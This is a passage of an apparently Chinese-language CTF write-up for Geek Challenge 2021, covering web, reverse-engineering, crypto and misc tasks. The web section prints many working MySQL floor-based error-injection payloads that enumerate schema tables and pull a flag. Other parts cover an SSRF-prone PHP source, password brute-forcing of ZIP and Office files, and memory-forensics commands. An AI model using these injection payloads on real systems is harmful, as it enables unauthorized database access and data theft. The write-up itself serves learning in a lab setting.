66%6F%6E%74%2D%73%69%7A%65%3A%35%30%30%25%3B%7D%3C%2F%53%54%59%4C%45%3E%3C%48%31 

%3E%26%23%78%31%66%36%34%39%3B%3C%2F%48%31%3E%22%3B%0A%7D%0A%0A%3C%2F%73%63%72%6 

9%70%74%3E%0A%0A

![](Geek2021/image-20211116203951455.png)

打开后发现要让id=longlone

但是longlone是要编码两次的

因为浏览器会编码一次

![](Geek2021/image-20211116204006588.png)

flag{PHP_1s_fu1king_awesome}

**12吊毛验证码**

![](Geek2021/image-20211116204026006.png)

![](Geek2021/image-20211116204035415.png)

![](Geek2021/image-20211116204046712.png)



![](Geek2021/image-20211116204057603.png)



## 13**反弹****SHELL**

也就是

## 14**anothersql**

floor报错注入

![](Geek2021/image-20211116204119673.png)

百度一个payload

![](Geek2021/image-20211116204133599.png)



![](Geek2021/image-20211116204141347.png)



Duplicate entry 'trueflag~1' for key '<group_key>

Duplicate entry 'global_status~0' for key '<group_key>'

Duplicate entry 'COLLATION_NAME~1' for key '<group_key>'

![](Geek2021/image-20211116204158959.png)



![](Geek2021/image-20211116204207417.png)

~id~1

![](Geek2021/image-20211116204219783.png)

Duplicate entry '~1~1' for key '<group_key>

![](Geek2021/image-20211116204235611.png)



![](Geek2021/image-20211116204243471.png)

uplicate entry '~SYC{U_4N0vv_3rR0r_Inj3c410n}~1' for key '<group_key 

-1 'union select (select 1 from(select count(*),concat((select 

concat(table_name,0x7e)),floor(rand(0)*2))x from information_schema.tables group 

by x)a),2,3,4 #global_status~0 

-1 'union select (select 1 from(select count(*),concat((select 

concat(column_name,0x7e)),floor(rand(0)*2))x from information_schema.columns 

group by x)a),2,3,4 # 

Duplicate entry 'COLLATION_NAME~1' for key '<group_key> 

-1 'union select (select 1 from(select count(*),concat((select 

concat(COLLATION_NAME,0x7e)),floor(rand(0)*2))x from information_schema.columns 

group by x)a),2,3,4 # 

Duplicate entry 'utf8_general_ci~1' for key '<group_key> 

-1 'union select (select 1 from(select count(*),concat((select 

concat(database(),0x7e)),floor(rand(0)*2))x from information_schema.tables group 

by x)a),2,3,4 # 

true____flag~1 

-1 'union select (select 1 from(select count(*),concat((select 

concat(true____flag~,0x7e)),floor(rand(0)*2))x from information_schema.columns 

group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,table_name,0x7e)from information_schema.tables where 

table_schema=database() limit 0,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,column_name,0x7e)from information_schema.columns where 

table_schema=database() limit 0,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,id,0x7e)from true____flag.syclover limit 0,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,id,0x7e)from true____flag.syclover limit 0,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,column_name,0x7e)from information_schema.columns where 

table_schema=database() limit 0,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 #

123123

会不会是redis密码？

任务提示端口

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,1,0x7e) from id limit 0,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,column_name,0x7e)from information_schema.columns where 

table_schema=database() limit 1,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,column_name,0x7e)from information_schema.columns where 

table_schema=database() limit 2,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,column_name,0x7e)from information_schema.columns where 

table_schema=database() limit 3,1),floor(rand(0)*2))x from 

information_schema.tables group by x)a),2,3,4 # 

-1' union select (select 1 from (select count(*),concat((select 

concat(0x7e,flag,0x7e)from true____flag.syclover limit 0,1),floor(rand(0)*2))x 

from information_schema.tables group by x)a),2,3,4 # 

这是我用过的语句，我也不知道哪个有用了，但是就是用这些查出来的 



**15GIVE ME YOUR LOVE**

<?php 

// I hear her lucky number is 123123 

highlight_file(__FILE__); 

$ch = curl_init(); 

$url=$_GET['url']; 

if(preg_match("/^https|dict|file:/is",$url)) 

{ 

echo 'NO NO HACKING!!'; 

die(); 

}

curl_setopt($ch, CURLOPT_URL, $url); 

curl_setopt($ch, CURLOPT_HEADER, 0); 

curl_exec($ch); 

curl_close($ch); 

?><p>用BP扫端口试试</p>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a><strong>RE</strong></h2><p>1.<strong>easypyc</strong></p>
<p>先将这个pyc文件搞成py文件</p>
<p>首先如何生成py文件：</p>
<p>一，打包成的文件需要先解压找到pyc目录。<a target="_blank" rel="noopener" href="http://解压用到的工具pyinstxtractor.py/">解压用到的工具pyinstxtractor.py</a>，在Github上有直接下载就欧克。</p>
<p>使用方法：将exe文件放在同一个包下，在文件路径下打开cmd，</p>
<p>运行python <a target="_blank" rel="noopener" href="http://pyinstxtractor.py/">pyinstxtractor.py</a> &lt;待解包文件名.ex&gt;</p>
<p>生成一个&lt;待解包文件名&gt;_extracted 文件夹即为成功</p>
<p>二，寻找相应的pyc文件</p>
<p>一般会生成多个多个pyc文件，我们需要的是与 &lt;待解包文件名&gt;相同的pyc文件</p>
<p>正常情况下，该pyc文件无法直接进行反编译，在将python文件打包成exe文件的过程中，会抹去</p>
<p>pyc文件前面的部分信息，所以在反编译之前需要检查并添加上这部分信息。</p>
<p>丢失的信息一般存储在struct关键字命名的文件里面</p>
<p>用winhex打开两个文件，一般情况下就是通过把struct文件的前十六个字节复制到待编译pyc文件之前 三，反编译怎么办！建议不使用在线编译，我们用cmd中命令：</p>
<p>uncompyle6 easy.pcy &gt; <a target="_blank" rel="noopener" href="http://easy.py/">easy.py</a></p>
<p>就会有反编译后的py文件出来！</p>
<p>当然以上所有操作必须在同一路径下进行！</p>
<h1 id="uncompyle6-version-3-7-4"><a href="#uncompyle6-version-3-7-4" class="headerlink" title="uncompyle6 version 3.7.4"></a>uncompyle6 version 3.7.4</h1><h1 id="Python-bytecode-3-8-3413"><a href="#Python-bytecode-3-8-3413" class="headerlink" title="Python bytecode 3.8 (3413)"></a>Python bytecode 3.8 (3413)</h1><h1 id="Decompiled-from-Python-3-8-3-tags-x2F-v3-8-3-6f8c832-May-13-2020-22-37-02-MSC-v-1924-64-bit-AMD64"><a href="#Decompiled-from-Python-3-8-3-tags-x2F-v3-8-3-6f8c832-May-13-2020-22-37-02-MSC-v-1924-64-bit-AMD64" class="headerlink" title="Decompiled from: Python 3.8.3 (tags&#x2F;v3.8.3:6f8c832, May 13 2020, 22:37:02) [MSC v.1924 64 bit (AMD64)]"></a>Decompiled from: Python 3.8.3 (tags&#x2F;v3.8.3:6f8c832, May 13 2020, 22:37:02) [MSC v.1924 64 bit (AMD64)]</h1><h1 id="Embedded-file-name-easypyc-py"><a href="#Embedded-file-name-easypyc-py" class="headerlink" title="Embedded file name: easypyc.py"></a>Embedded file name: <a target="_blank" rel="noopener" href="http://easypyc.py/">easypyc.py</a></h1><p>whatbox &#x3D; [ 0] * 256</p>
<p>def aaaaaaa(a, b):</p>
<p> k &#x3D; [ 0] * 256 </p>
<p>t &#x3D; 0 </p>
<p>for m in range(256): </p>
<p>whatbox[m] &#x3D; m </p>
<p>k[m] &#x3D; ord(a[(m % b)]) </p>
<p>else:</p>
<p> for i in range(256):</p>
<p> t &#x3D; (t + whatbox[i] + k[i]) % 256</p>
<p> temp &#x3D; whatbox[i] </p>
<p>whatbox[i] &#x3D; whatbox[t] </p>
<p>whatbox[t] &#x3D; temp</p>
<p>def bbbbbbbbbb(a, b): </p>
<p>q &#x3D; 0 </p>
<p>w &#x3D; 0</p>
<p> e &#x3D; 0</p>
<p> for k in range(b): </p>
<p>q &#x3D; (q + 1) % 256 </p>
<p>w &#x3D; (w + whatbox[q]) % 256</p>
<p> temp &#x3D; whatbox[q] </p>
<p>whatbox[q] &#x3D; whatbox[w] </p>
<p>whatbox[w] &#x3D; temp</p>
<p> e &#x3D; (whatbox[q] + whatbox[w]) % 256 </p>
<p>a[k] &#x3D; a[k] ^ whatbox[e] ^ 102</p>
<p>def ccccccccc(a, b): </p>
<p>for i in range(b): </p>
<p>a[i] ^&#x3D; a[((i + 1) % b)] </p>
<p>else: </p>
<p>for j in range(1, b): a[j] ^&#x3D; a[(j - 1)]</p>
<p>if <strong>name</strong> &#x3D;&#x3D; ‘<strong>main</strong>‘: </p>
<p>kkkkkkk &#x3D; ‘Geek2021’</p>
<p> tttttt &#x3D; [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165, 136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87]</p>
<p> ssss &#x3D; input(‘Please input your flag:’)</p>
<p> inp &#x3D; [0] * len(ssss)</p>
<p> if len(ssss) !&#x3D; 32: </p>
<p>print(‘Length Error!!!!’) </p>
<p>exit(0) </p>
<p>for i in range(len(ssss)): </p>
<p>inp[i] &#x3D; ord(ssss[i])</p>
<p> else:</p>
<p> aaaaaaa(kkkkkkk, len(kkkkkkk)) </p>
<p>bbbbbbbbbb(inp, 32) </p>
<p>ccccccccc(inp, 32)</p>
<p> for m in range(32): </p>
<p>if tttttt[m] !&#x3D; inp[m]:</p>
<p> raise Exception(‘sorry your flag is wrong’) </p>
<p>print(‘success!!!!!!’) </p>
<p>print(format(ssss)) </p>
<p>print(‘your flag is {}’.format(ssss))</p>
<p>简单说一下过程，输入的flag应该是32位将32位字符转换成十进制，在经过aaaaaa，bbbbbbbbb，ccccccccc这三个函数，最后进行比较。那么我们现在有tttttt这个值就可逆向出来我们想要的flag了。</p>
<p>先通过aaaaa这个函数把whatbox解出来，虽然能从这个函数看出这应该是RC4编写的！</p>
<p>在逆向时，应把函数定义去掉，带着函数定义做是不明智的选择！</p>
<p><img src="/Geek2021/image-20211113142820637.png"></p>
<p><img src="/Geek2021/image-20211113142837320.png"></p>
<h3 id="2-new-language"><a href="#2-new-language" class="headerlink" title="2.new_language"></a>2.<strong>new_language</strong></h3><p>这是一道c#的题，这次逆向感觉很怪，出的都是各种别的语言的逆向，但本质就是找一个软件给他搞成c语言，这个也不例外，我们用dnspy这个软件，将文件在软件中打开</p>
<p><img src="/Geek2021/image-20211115202339717.png"></p>
<p>进入main函数</p>
<p><img src="/Geek2021/image-20211115202405129.png"></p>
<p><img src="/Geek2021/image-20211115202416267.png"></p>
<p>简单分析一下：</p>
<p>flag的长度是38，然后给出flag格式，然后进入循环加密</p>
<p><img src="/Geek2021/image-20211115202823571.png"></p>
<p>加密完再进行比较，其中加密这一步经过我多次改代码发现当sbox下标与i是一致时，答案正确，但为什么还是有些不太清楚，还得再看看巨佬们写的wp，接下来就就可以写脚本了！</p>
<p><img src="/Geek2021/image-20211115204404594.png"></p>
<p><img src="/Geek2021/image-20211115204426830.png"></p>
<p>加上外套即可！</p>
<p>3.<strong>珍惜生命</strong></p>
<p>源码按照上面一道题的规则可以搞出来</p>
<p><img src="/Geek2021/image-20211114001054680.png"></p>
<p>我们讲解一下本题思路，输入flag和key，将给定的key进行加密，得到新的KEY，再用KEY与tmp做运算，之后对比给定flag是否一致。这么复杂的key加密肯定是要用我们z3库的了！</p>
<p>给出脚本</p>
<p><img src="/Geek2021/image-20211114001438411.png"></p>
<p>接下来，解出key</p>
<p><img src="/Geek2021/image-20211114001539130.png"></p>
<p>排一下序得到key，我们接下来给出flag脚本：</p>
<p><img src="/Geek2021/image-20211114001656859.png"></p>
<p><img src="/Geek2021/image-20211114001721440.png"></p>
<p>得到flag前后记得加SYC{}</p>
<p>学到了在python中[a:b],是下标从a到b，左闭右开！</p>
<p>SYC{W3$c0m3_T0_th3_py_w0r1d_@nd_z3_1s_s0000_g00d!!}</p>
<h3 id="4-Re0"><a href="#4-Re0" class="headerlink" title="4.Re0"></a>4.<strong>Re0</strong></h3><p>很简单，打开查strings即可。</p>
<p><img src="/Geek2021/image-20211115192956744.png"></p>
<p>SYC{Welcome_to_Geek_challenge2021}</p>
<h3 id="5-Re1"><a href="#5-Re1" class="headerlink" title="5.Re1"></a>5.<strong>Re1</strong></h3><p>打开ida，发现这个题就两个函数，我们先点进去第一个函数</p>
<p><img src="/Geek2021/image-20211115185834824.png"></p>
<p><img src="/Geek2021/image-20211115185856584.png"></p>
<p>这一看就是一个base64加密，我们点进这个常数aAbc…..发现连表都没换！！！</p>
<p>那就非常简单了</p>
<p><img src="/Geek2021/image-20211115185844223.png"></p>
<p><img src="/Geek2021/image-20211115185912822.png"></p>
<p>得到U1lDe1hPUl9hbmRfYmFzZTY0X2FyZV90aGVfYmFzaXNfb2ZfcmV2ZXJzZX，在线解密一下</p>
<p><img src="/Geek2021/image-20211115185924295.png"></p>
<p>flag：SYC{XOR_and_base64_are_the_basis_of_reverse}</p>
<h3 id="6-win32"><a href="#6-win32" class="headerlink" title="6.win32"></a>6.<strong>win32</strong></h3><p>这道题我们可以看出是加壳的，这里说一下怎么去壳，用upx，将文件放在upx目录下，我们在upx目录下启动cmd，输入upx.exe -h，会装上很多东西。</p>
<p>输入加壳命令：upx win32.exe :显示加壳成功。</p>
<p>使用脱壳命令：upx -d win32.exe:提示脱壳成功。</p>
<p>脱壳成功后就可以拖到ida中</p>
<p>虽然这道题我什么都看不懂，但是我们有hints：base64，所以我们查表</p>
<p><img src="/Geek2021/image-20211115185930810.png"></p>
<p><img src="/Geek2021/image-20211115185935630.png"></p>
<p>有table，还有字符串，并且table没变，直接复制字符串base64解码</p>
<p><img src="/Geek2021/image-20211115185942943.png"></p>
<p>FLAG：SYC{y0u_g3t_A_f1ag_by_cyberloafing_auth0r}</p>
<h3 id="7-调试"><a href="#7-调试" class="headerlink" title="7.调试"></a>7.<strong>调试</strong></h3><p><img src="/Geek2021/image-20211115193218585.png"></p>
<p>64位无壳程序</p>
<p>这道题我没用idapatch修改，进入main函数看到字符串</p>
<p>797G91WhVFeM465FoGJuWpHKDro2QyCixboJV7uhVAV2pfxkhtiTo3CHd7a</p>
<p><img src="/Geek2021/image-20211115192106854.png"></p>
<p>base58解码直接出答案：SYC{C0ngr@tuIatlOns_thls_1s_th3_r!gHt_f!ag}</p>
<p><strong>CRYPTO</strong></p>
<h3 id="8-Classical-music"><a href="#8-Classical-music" class="headerlink" title="8.Classical music"></a>8.<strong>Classical music</strong></h3><p>给了个文本，提示是in einem baechlein helle da schoss in froher eil</p>
<p>qy sdrgx bswkjlpuh zmntp rv wesokk qp fcabwz gqw<br>rdi nlufaaehp rijmntp ‘jjvwmej’ oqg etz jxmkt<br>tqc wvlnv sv fex sykbclp iih ulh af awedeyj ‘zwp’<br>osn qwytwjv hidobdmkvd pvhg tm cditey nuwkjtpwi dw<br>pif xqucsql eqv lpf myvp wgzt cn oqg mngz dhvrf<br>fnv kij mtf estvmx pgyvp waw akcs puk nkanvgiky wsfl<br>uowmhy lgu honwgc hwdtg sz puupv qnv imest ywjtintn<br>kw hipbbx gc daw ’nqrpxfwukb‘ dsdrgc afymn ntobl<br>lqks sihntcz oitd oqg vqgjp rdi bpil rc nays yj ucksh<br>yeu ‘mauztgiy’ fowkmqdqc xtfetw cpd pt cup ga rsyeest<br>kg hwcvfy kmkvp fpxg oak xqucsxyav biadzpv orsf<br>cpd tob eqv zpuzq dwulw ach ouy tmvzzu ii cy<br>cgfvgce fbw nnir kdxj fnvwzuczdyk ipl lry yraejuiue dkw svf kffgc dcauwa vhp rfso ka wcritnakw sgy</p>
<p>维吉尼亚密码直接出来答案</p>
<p>iloveclassicalmusic一直重复</p>
<p>SYC{i_love_classical_music}</p>
<h3 id="9-三个也可以"><a href="#9-三个也可以" class="headerlink" title="9.三个也可以"></a>9.<strong>三个也可以</strong></h3><p>一个简单的RSA加密，只不过有3个质数，给出脚本：</p>
<p><img src="/Geek2021/image-20211114203834237.png"></p>
<h3 id="10-Superposition-under-the-starry-sky"><a href="#10-Superposition-under-the-starry-sky" class="headerlink" title="10.Superposition under the starry sky"></a>10.<strong>Superposition under the starry sky</strong></h3><h3 id=""><a href="#" class="headerlink" title=""></a><img src="/Geek2021/image-20211115160257039.png"></h3><p>考的是LCG线性同余，非常简单，</p>
<p><img src="/Geek2021/image-20211115155839509.png"></p>
<p><img src="/Geek2021/image-20211115155853794.png"></p>
<p>给出脚本：</p>
<p><img src="/Geek2021/image-20211114204424892.png"></p>
<p>b’SYC{The_rain_drenched_the_sky}’</p>
<h3 id="11-easy-house-of-Classic-Crypto"><a href="#11-easy-house-of-Classic-Crypto" class="headerlink" title="11.easy house of Classic Crypto"></a>11.<strong>easy house of Classic Crypto</strong></h3><p>so easy，就是答案不太好拼起来</p>
<p><img src="/Geek2021/image-20211114204740383.png"></p>
<p>得到flag</p>
<h3 id="12-Random"><a href="#12-Random" class="headerlink" title="12.Random"></a>12.<strong>Random</strong></h3><p><img src="/Geek2021/image-20211115160220863.png"></p>
<p>这个考察的是MT19937，参考了一下之前的SUCTF的脚本，源码都几乎一样。。。</p>
<p>这个题意思解释一下：flag先用bytes_to_long转换再用bin转换成二进制，那么转换回来就要用long_to_bytes,再用int（xx，2）转换成10进制，完成逆向</p>
<p><img src="/Geek2021/image-20211116112920543.png">在经过下面的运算产生随机数，其中最重要的是change这一个函数</p>
<p>可以产生随机数，引用原题wp的一句话：随机数发生器MT19937在从状态提取32bits随机数时进行四步平移和异或运算，但该四步运算均为可逆运算，从而导致可从32bits随机数还原状态。</p>
<p><img src="/Geek2021/image-20211115160033225.png"></p>
<p>我们给出脚本：</p>
<p>from Crypto.Util.number import *</p>
<p>data &#x3D; [389902299, 3515959351, 2216779731, 2601284435, 514154742, 4172047173, 2921107804, 2217826537, 4248207905, 1322376767]<br>c &#x3D; ‘01101100010001011100100011111110110000101111000001100001110010001100111000110010111101011111100101011100111011110100001010100111100000010101100011001000011111110111111001010000010000111000101000011111011101001011110001010100100011001010001001111110011111100101111010000010101011100010001111011001010010001010001110001111’</p>
<p>def decrypt_left(cipher, blocksize, mask):<br>    plain &#x3D; cipher<br>    t &#x3D; cipher<br>    for i in range(32 &#x2F;&#x2F; blocksize):<br>        tt &#x3D; (t &lt;&lt; blocksize) &amp; mask<br>        plain &#x3D; plain ^ tt<br>        t &#x3D; tt<br>    return plain</p>
<p>def decrypt_right(cipher, blocksize, mask):<br>    plain &#x3D; cipher<br>    t &#x3D; cipher<br>    for i in range(32 &#x2F;&#x2F; blocksize):<br>        tt &#x3D; (t &gt;&gt; blocksize) &amp; mask<br>        plain &#x3D; plain ^ tt<br>        t &#x3D; tt<br>    return plain</p>
<p>def invert(block):<br>    block &#x3D; decrypt_right(block, 18, 0xffffffff)<br>    block &#x3D; decrypt_left(block, 15, 4022730752)<br>    block &#x3D; decrypt_left(block, 7, 2636928640)<br>    block &#x3D; decrypt_right(block, 11, 0xffffffff)<br>    return block</p>
<p>def transform(message):<br>    for i in range(len(data)):<br>        data[i]&#x3D;invert(data[i])<br>    rand &#x3D; ‘’</p>
<pre><code>for i in range(len(data)):
    rand+=bin(data[i])[2:].zfill(32)

flag = &#39;&#39;

for i in range(len(message)):
    flag+=str(int(message[i], 2)^int(rand[i], 2))

print(long_to_bytes(int(flag, 2)))
</code></pre>
<p>transform(c)</p>
<p><img src="/Geek2021/image-20211114232000260.png"></p>
<p>解出flag</p>
<p><em><strong>CRYPTO</strong></em>总结：剩余的密码题我还是很关注的，我个人比较热爱数学，baby house of rsa 应该不难的，但我不知道要求什么，还是没有认真进行下去,我还是很喜欢密码的！</p>
<p><strong>MISC</strong></p>
<h3 id="13-圣嘉然"><a href="#13-圣嘉然" class="headerlink" title="13.圣嘉然"></a>13.<strong>圣嘉然</strong></h3><p>我们打开文件</p>
<p><img src="/Geek2021/image-20211115190006547.png"></p>
<p>提示用winrar解开，我刚开始以为是用mount挂载，但输入strings +file是能查里面有什么字符串，发现有flag.txt,这个时候想用mount ans2 &#x2F;mnt ,挂载，但不行，原因是其是data数据，需要修复。我们根据提示用winrar修复，但修复后提示还是有错误，我试了一下用360压缩打开，发现成功了！</p>
<p><img src="/Geek2021/image-20211115190014965.png"></p>
<p>打开文件</p>
<p>我好想做嘉然👪小姐的狗啊。 可是嘉然小姐说她喜欢的是猫🐘，我👰哭了。 我知道既不是狗也不是猫的我为什么要哭的。因为我其实是一只老鼠 👣。 我从没奢望嘉然小姐能喜欢自己👴。我明白的，所有人都喜欢理解余裕上手天才打钱的萌萌的狗狗或者猫猫👚，没有人会喜欢阴湿带病的老鼠。 但我还是问了嘉然小姐:“我能不能做你的狗？” 我知道我是注定做不了狗👜的。但如果她喜欢狗，我👲就可以一直在身边看着她了，哪怕她怀里抱着的永远都是狗。 可是她说喜欢的是猫。 她现在还在看着我，还在逗我开心，是因为猫还没有出现，只有我这老鼠每天蹑手蹑脚地从洞👞里爬出来，远远地和她对视。 等她喜欢的猫👛来了的时候，我就该重新滚回我👥的洞了吧。 但我还是好喜欢她👠，她能在我还在她身边的时候多看我几眼吗👘？ 嘉然小姐说接下来的每个圣诞夜都要和大家一起过👘。我不知道大家指哪些人👖。好希望这个集合能够对我做一次胞吞👥。 猫猫👰还在害怕嘉然小姐。 我会去把她爱的猫猫引来的👘。 我👤知道稍有不慎，我就会葬身猫🐘口。 那时候嘉然小姐大概会把我的身体好好地装起来扔到门外👖吧。 那我就成了一包鼠条👰，嘻嘻👜。 我希望她能把我扔得近一点🐧，因为我还是好喜欢她👩。会一直喜欢下去的。 我的灵魂透过窗户向里面看去，挂着的铃铛在轻轻鸣响，嘉然小姐慵懒地靠在沙发上，表演得非常温顺的橘猫坐在她的肩膀👬。壁炉的火光照在她的脸庞，我冻僵的心脏在风里微微发烫👘👖。 —新户眠子</p>
<p>我们提取表情，</p>
<p><img src="/Geek2021/image-20211115190024178.png"></p>
<p>这肯定是栅栏密码：s!yl}ce{gdniaa_nyam!<em>ye0rua</em></p>
<p><img src="/Geek2021/image-20211115190031018.png"></p>
<p>这肯定是栅栏密码：s!yl}ce{gdniaa_nyam!<em>ye0rua</em></p>
<h3 id="14-说实话挺好玩的，不是吗？"><a href="#14-说实话挺好玩的，不是吗？" class="headerlink" title="14.说实话挺好玩的，不是吗？"></a>14.<strong>说实话挺好玩的，不是吗？</strong></h3><p>本题打开是一个word文档，用zip打开后发现提示是一个8位数字，那么就开始暴力破解：</p>
<p>推荐用advanced Office Password Recovery（呜呜呜，我花了6块钱），但破解八位数字太慢，我破解了一天电脑就起飞了，自动关机了，就破防了。然后发现了个网站能够直接破解密码。</p>
<p>破解完打开文档，显然是个隐写，这里用到snow隐写，将空白可以复制到文档中，当然我们可以用制表符，看的更清楚：<br><img src="/Geek2021/image-20211115190051426.png"></p>
<p>将txt放在snow目录下</p>
<p><img src="/Geek2021/image-20211115190104183.png"></p>
<p>SYC{misc_mei_qian_tu}</p>
<h3 id="15-每日一溜"><a href="#15-每日一溜" class="headerlink" title="15.每日一溜"></a>15.<strong>每日一溜</strong></h3><p>这个题需要用到wireshark：</p>
<p>Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。— 百度百科</p>
<p>我们将文件拖入</p>
<p><img src="/Geek2021/image-20211115190211239.png"></p>
<p>这种题一般先找字符串搜索是否有直接的flag，用ctrl+f进行搜索。接下来我们找到http，因为只有http才可以传输我们想要的数据，接下来我们可以点击鼠标右键追踪流，选择tcp或者http查看是否有flag</p>
<p><img src="/Geek2021/image-20211115190224604.png"></p>
<p><img src="/Geek2021/image-20211115190234839.png"></p>
<p>我们发现是一个png格式，我们有两种方法能将图片提取出来：</p>
<p>1.找到</p>
<p>我们右键将其16进制码copy下来，转成base64编码后，用在线网站，将base64转成图片，但保存的时候是php文件，对于我这种没接触过web的萌新有些小难度。</p>
<p>2.我们直捣黄龙：查看POST数据包 - Media Type - 导出分组字节流</p>
<p><img src="/Geek2021/image-20211115190335785.png"></p>
<p>右键导出字节流，我们得到了一个bin文件</p>
<p><img src="/Geek2021/image-20211115190358709.png"></p>
<p>下面，我们放到虚拟机中，binwalk一下</p>
<p><img src="/Geek2021/image-20211115190420884.png"></p>
<p>暗藏玄机，我们将zip文件分离出来</p>
<p><img src="/Geek2021/image-20211115190437952.png"></p>
<p><img src="/Geek2021/image-20211115190449900.png"></p>
<p>发现txt文件，一看就是换表的base64解密，给出脚本！</p>
<p>给出脚本：import base64</p>
<p> data&#x3D;’FhMrPh94JHqS2jGQGM6QCsaDzI6ZyHqQQB’ t1&#x3D;’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+&#x2F;‘ t2&#x3D;’vwxrstuopq34567ABCDEFGIHJyz021PQRSTKNMLOZabcdUVWXYefghijklmn89+&#x2F;‘ result &#x3D;’’ </p>
<p>for ch in data: </p>
<p>result +&#x3D; t1[t2.index(ch)] </p>
<p>result &#x3D;bytearray(base64.b64decode(result+”&#x3D;&#x3D;”)) </p>
<p>print(result)</p>
<p><img src="/Geek2021/image-20211115190517404.png"></p>
<h3 id="16-PANDORA-PARADOXXX"><a href="#16-PANDORA-PARADOXXX" class="headerlink" title="16.PANDORA PARADOXXX"></a>16.<strong>PANDORA PARADOXXX</strong></h3><p>重申一下我是学RE的！！！！</p>
<p>这个题太难受了我，给了张图片，binwalk一下，提取zip文件</p>
<p><img src="/Geek2021/image-20211113145150501.png"></p>
<p><img src="/Geek2021/image-20211113145322194.png"></p>
<p>第一层加密：</p>
<p><img src="/Geek2021/image-20211113145429158.png"></p>
<p>使用ziperello来破解，是6位数字：513692</p>
<p><img src="/Geek2021/A9DCK~%252525A%252525ZW%25257DHDLIF%25257B6OTHK.png"></p>
<p>打开有第二层：</p>
<p>我选择用数字+字母大小写6位破解：得到密码Maimai</p>
<p><img src="/Geek2021/image-20211113145910066.png"></p>
<p>还有一层我也是无语了。。。</p>
<p>我用字典破出是challenge，果真跟hints里一样。。。</p>
<p><img src="/Geek2021/image-20211113150049138.png"></p>
<p>打开就是flag！</p>
<h3 id="17-SGA-Character"><a href="#17-SGA-Character" class="headerlink" title="17.SGA Character"></a>17.<strong>SGA Character</strong></h3><p>给了一张神奇的图片<img src="/Geek2021/image-20211113150838314.png"></p>
<p>太熟悉了，这不就是mc附魔书上的文字吗，是银河字母对照表，找一份对照表从后往前找flag！</p>
<h3 id="18-今天有被破防吗？"><a href="#18-今天有被破防吗？" class="headerlink" title="18.今天有被破防吗？"></a>18.<strong>今天有被破防吗？</strong></h3><p>这是一道RGB类型的题</p>
<p>附上一篇例题：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43342566/article/details/102418732?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163678908816780264069308%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=163678908816780264069308&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-1-102418732.pc_search_mgc_flag&amp;utm_term=rgb+misc&amp;spm=1018.2226.3001.4187">https://blog.csdn.net/qq_43342566/article/details/102418732?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163678908816780264069308%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=163678908816780264069308&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-1-102418732.pc_search_mgc_flag&amp;utm_term=rgb+misc&amp;spm=1018.2226.3001.4187</a></p>
<p>我们用notepad++打开发现啊1166400行，而且是3个16进制数，1166400&#x3D;1080*1080，介绍一下tuple（），tuple是一个元组，且tuple主要是可以返回出多个值，用int（xx，16）可以将16进制转换成十进制，split的用法是进行字符串切片，strip（）作用是去掉左右两端的空格，最后存为一张图片即可。</p>
<p><img src="/Geek2021/image-20211113165941957.png"></p>
<p><img src="/Geek2021/image-20211113165904421.png"></p>
<p>我太菜了。。。。。</p>
<p><img src="/Geek2021/image-20211113191841377.png"></p>
<p>有图片，我学了一下午咋还原图片。。。。。太菜了不会啊。。。只能将来看别人的wp</p>
<p>我直接手动拼接！</p>
<p><img src="/Geek2021/image-20211113191948745.png"></p>
<p>大概出来了，其中要镜像一下，输入的时候发现不对，原来是要加下划线。。。。</p>
<p>还是我太菜了。</p>
<h3 id="19-EzForensics"><a href="#19-EzForensics" class="headerlink" title="19.EzForensics"></a>19.<strong>EzForensics</strong></h3><p>简单取证：如果volatlity一直报错说未找到命令，是因为少了一个命令，系统会提示</p>
<p>先输入volatility -f SSSSSSSSS.raw imageinfo 获得镜像信息，可知系统为Win7SP1x64</p>
<p><img src="/Geek2021/image-20211114130739257.png"></p>
<p>我们可以使用volatility -f SSSSSSSSS.raw –profile&#x3D;Win7SP1x64 pslist来查进程</p>
<p><img src="/Geek2021/image-20211114131940514.png"></p>
<p>接下来一个个查历史：</p>
<p>volatility -f SSSSSSSSS.raw –profile&#x3D;Win7SP1x64 iehistory     无</p>
<p><img src="/Geek2021/image-20211114131126720.png"></p>
<p>再查文件</p>
<p><img src="/Geek2021/image-20211114133613154.png"></p>
<p>把所有文件下载下来volatility -f SSSSSSSSS.raw –profile&#x3D;Win7SP1x64 dumpfiles -Q 0x000000007ebcf900 –dump-dir&#x3D;.&#x2F;  再查其中内容</p>
<p><img src="/Geek2021/image-20211114133531087.png"></p>
<p><img src="/Geek2021/image-20211114134108021.png"></p>
